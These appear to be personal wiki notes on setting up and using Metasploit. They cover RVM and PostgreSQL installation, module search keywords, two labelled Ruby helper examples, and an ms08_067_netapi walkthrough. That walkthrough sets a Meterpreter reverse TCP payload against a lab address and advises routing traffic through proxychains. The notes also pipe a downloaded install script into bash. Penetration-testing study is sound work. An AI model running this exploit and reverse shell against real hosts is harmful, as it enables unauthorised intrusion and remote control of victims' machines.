
Metasploit

Created Thursday 07 December 2017


# An exploit and information gathering infrastructure.
# Remember to run metasploit through proxychains.


Installation

$ pacman -S metasploit


RVM

# Metasploit is built with Ruby, and to get it working we'll need RVM (Ruby Version Manager), a
# command line tool that lets us install and manage multiple Ruby environments
$ curl -L get.rvm.io > rvm-install
$ bash < ./rvm-install


# You might get a WARNING about --user-dirs (or something like that); just ignore it
# After installation, check that everything worked
$ type rvm | head -n1


# This should return something like `rvm is a function` along with a location in your home directory
# If not, try to log out/back in. If that still didn't do the trick, perform the actions from a different
# tty - I had an issue getting it to show in my normal CLI, though steps had been taken to add it in my
# dotfile/.zprofile, but in a different tty `type rvm | head -n1` gave me the correct output.


# Check for requirements
$ rvm requirements


# You will need to install the correct version of Ruby.
# Check https://github.com/rapid7/metasploit-framework/blob/master/.ruby-version
# which will give you the current version to use.


# You can get a list of known environments with:
$ rvm list known


# To install 2.3.3 (for example)
$ rvm install 2.3.3


# Then to set it as default
$ rvm use 2.3.3 --default


# Source the RVM installation
$ source ~/.rvm/scripts/rvm


# And install the necessary gems for Msfconsole
$ gem install bundler
$ bundle init
$ bundle install


PostgreSQL

# Metasploit also needs a database for our purposes, and it only works with PostgreSQL
$ pacman -S postgresql


# Set a password for the new postgres system user (needs root)
$ sudo passwd postgres


# Switch to the Postgres profile
$ sudo -u postgres -i


# Now, as the substitute postgres user, initialize the database cluster and exit
[postgres]$ initdb --locale $LANG -E UTF8 -D '/var/lib/postgres/data'
[postgres]$ exit


# Enable and start the postgresql server
$ systemctl enable --now postgresql.service


# Now switch back to the Postgres profile
$ sudo -u postgres -i


# And create a database user (use your own user name for convenience)
# This command will ask you for a user name and whether it should be a superuser
# Once the role is created (matching your own login) you can exit the postgres user and run commands
# from your normal profile/CLI
[postgres]$ createuser --interactive
[postgres]$ exit


# Create our msf database
$ createdb msf


Setting up the database

# Now that we have Ruby and PostgreSQL up and running, fire up msf so we can set up the db
$ msfconsole


# Connect to the db we created in the steps above (replace stick with your own user name)
msf > db_connect stick@msf
msf > db_rebuild_cache


# Check that it's connected to the db
msf > db_status
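# Added example, not Metasploit's own code: the connection string that db_connect accepts has the
# form user[:pass]@[host[:port]/]database, and the same connection can be kept in ~/.msf4/database.yml
# so msfconsole connects on every start without typing db_connect. The script below models that
# string and writes the file with owner-only permissions. It assumes msfconsole reads the keys
# adapter, database, username, password, host, port, pool and timeout from the "production" entry
# of database.yml; the user name stick and the database msf are the ones used on this page.

```ruby
require 'yaml'
require 'fileutils'

# Split "stick@msf" or "stick:s3cret@localhost:5432/msf" into its parts.
# No host means "connect over the local UNIX socket", which is what db_connect stick@msf does.
def parse_db_uri(spec)
  auth, dest = spec.split('@', 2)
  if dest.nil?            # no '@' at all: the whole string is the destination
    dest = auth
    auth = nil
  end
  res = { user: nil, pass: nil, host: nil, port: nil, name: nil }
  res[:user], res[:pass] = auth.split(':', 2) if auth
  target, name = dest.split('/', 2)
  if name.nil?            # a bare "msf" is the database name, not a host name
    name = target
    target = nil
  end
  res[:host], res[:port] = target.split(':', 2) if target
  res[:port] = Integer(res[:port]) if res[:port]
  res[:name] = name
  res
end

# Build the database.yml document for one environment. Fields that were not given are left out,
# so PostgreSQL's defaults (local socket, port 5432) apply instead of a literal null.
def database_yml(spec, env: 'production')
  c = parse_db_uri(spec)
  raise ArgumentError, "no database name in #{spec.inspect}" if c[:name].nil? || c[:name].empty?
  entry = {
    'adapter'  => 'postgresql',
    'database' => c[:name],
    'username' => c[:user],
    'password' => c[:pass],
    'host'     => c[:host],
    'port'     => c[:port],
    'pool'     => 5,
    'timeout'  => 5
  }.reject { |_, v| v.nil? }
  { env => entry }.to_yaml
end

# Write the file readable by the owner only: it may contain the database password.
def write_database_yml(spec, path = File.join(Dir.home, '.msf4', 'database.yml'))
  doc = database_yml(spec)
  FileUtils.mkdir_p(File.dirname(path), mode: 0o700)
  File.open(path, 'w', 0o600) { |f| f.write(doc) }
  File.chmod(0o600, path)   # tighten a pre-existing file as well
  doc
end

if __FILE__ == $PROGRAM_NAME
  # Print the YAML for the connection string given on the command line (default: this page's stick@msf)
  puts database_yml(ARGV.fetch(0, 'stick@msf'))
end
```

# Run it with the same string you would give db_connect; with no host the generated entry has no
# host or port key, so the connection goes over the local socket just like the manual command.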



Usage

# You can discover many interesting things about a host with nmap - things that might be required
# as parameters in Metasploit, such as the operating system and software versions.


# There are different module types in Metasploit:

auxiliary - Various tasks, like scanning, detection and analysis
exploit - Takes advantage of a vulnerability
payload - What runs on the target right after a successful exploit
post - Various programs that can run after a successful exploit
encoder - Programs that provide encryption
nop - Does nothing; useful for padding out voids in executables



Searching

# Once you know the OS of a host, you can search for exploits against that target
# Say we are looking at a Novell product on a Linux platform
msf > search platform:linux type:exploit name:Novel


# The search keywords are as follows:

app: - Either client or server - each has its own exploits
author: - Name and email of the module author
type: - auxiliary, exploit, payload, post, encoder, nop
name: - Path name or a short description
platform: - The target's hardware or software platform


# You can also search for exploits by their reference in one of the following 4 exploit databases

bid: - (bugtraq) http://www.securityfocus.com/
cve: - https://www.cvedetails.com/
edb: - https://www.exploit-db.com/browse/
osvdb: - https://blog.osvdb.org/
ref: - Any of the above I think
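# Added example, not Metasploit's own search code: a small Ruby model of the keyword search described
# above, run over constructed module records, to show why `name:Novel` also finds "Novell" and how the
# keywords combine. It assumes every value is a case-insensitive substring match, that repeating a
# keyword ORs its values while different keywords are ANDed, that bid:/cve:/edb:/osvdb: only look at
# references with that prefix while ref: looks at all of them, and that a bare word without a keyword
# is matched against the module name and description. The module records and reference ids are
# constructed for the example and are not real modules.

```ruby
# Constructed module records; the CVE/BID/EDB/OSVDB ids are placeholders, not real references.
MODULES = [
  { type: 'exploit', name: 'exploit/linux/http/novell_example_rce',
    description: 'Novell example service remote code execution',
    platform: ['linux'], app: 'server', author: ['alice <alice@example.invalid>'],
    refs: ['CVE-0000-0001', 'BID-00001', 'EDB-00001'] },
  { type: 'exploit', name: 'exploit/windows/smb/example_smb_overflow',
    description: 'Example SMB service stack overflow',
    platform: ['windows'], app: 'server', author: ['bob'],
    refs: ['CVE-0000-0002', 'OSVDB-00002'] },
  { type: 'auxiliary', name: 'auxiliary/scanner/smb/smb_version',
    description: 'SMB version detection',
    platform: ['windows', 'linux'], app: 'server', author: ['bob'], refs: [] },
  { type: 'post', name: 'post/windows/manage/migrate',
    description: 'Migrate the session to another process',
    platform: ['windows'], app: 'client', author: ['carol'], refs: [] }
].freeze

KEYWORDS = %w[app author type name platform bid cve edb osvdb ref].freeze

# "platform:linux type:exploit name:Novel" -> {"platform"=>["linux"], "type"=>["exploit"], "name"=>["novel"]}
# Values are lower-cased once here so every comparison below is case-insensitive.
def parse_search_query(query)
  filters = Hash.new { |h, k| h[k] = [] }
  query.split.each do |term|
    key, value = term.split(':', 2)
    if value && KEYWORDS.include?(key.downcase)
      filters[key.downcase] << value.downcase
    else
      filters['text'] << term.downcase   # bare word: free-text match on name/description
    end
  end
  filters
end

# The strings one keyword is matched against for a single module record.
def fields_for(mod, key)
  case key
  when 'type'     then [mod[:type]]
  when 'name'     then [mod[:name], mod[:description]]
  when 'platform' then mod[:platform]
  when 'app'      then [mod[:app]]
  when 'author'   then mod[:author]
  when 'ref'      then mod[:refs]                       # any reference database
  when 'bid', 'cve', 'edb', 'osvdb'                     # only references from that database
    mod[:refs].select { |r| r.downcase.start_with?("#{key}-") }
  when 'text'     then [mod[:name], mod[:description]]
  else []
  end
end

# Every keyword must match (AND); within one keyword any listed value may match (OR).
def module_matches?(mod, filters)
  filters.all? do |key, values|
    haystack = fields_for(mod, key).map(&:downcase)
    values.any? { |v| haystack.any? { |h| h.include?(v) } }
  end
end

# Returns the full names of the matching modules, in record order.
def search(modules, query)
  filters = parse_search_query(query)
  modules.select { |m| module_matches?(m, filters) }.map { |m| m[:name] }
end

if __FILE__ == $PROGRAM_NAME
  query = ARGV.empty? ? 'platform:linux type:exploit name:Novel' : ARGV.join(' ')
  puts search(MODULES, query)
end
```

# The page's query, platform:linux type:exploit name:Novel, narrows the constructed set to the one
# Linux exploit whose name contains "novel"; repeating a keyword, as in type:exploit type:post, widens
# rather than narrows the result.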



Information about an Exploit

# You can get information about a module and see which options it requires
msf > info windows/manage/migrate


Using an Exploit

# Once you've found a suitable exploit, use it
msf > use exploit/windows/smb/ms08_067_netapi


# ms08_067_netapi is an SMB service exploit for Windows XP and Windows Server 2003 - great if there is no firewall in the way.


# You can then see which options this exploit requires to do its magic
msf exploit(ms08_067_netapi) > show options


# All fields marked Required must be set
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102


# Now choose your Payload
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp


# The meterpreter payload will create a reverse TCP connection, allowing you to run commands
# on the target's system.


# Now that you have added a Payload, more options will become available
msf exploit(ms08_067_netapi) > show options


# Meterpreter requires LHOST (local host) as a return address, the address the exploited machine
# will send its connection request to.
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1


# Now run the attack and hope for the best.
msf exploit(ms08_067_netapi) > exploit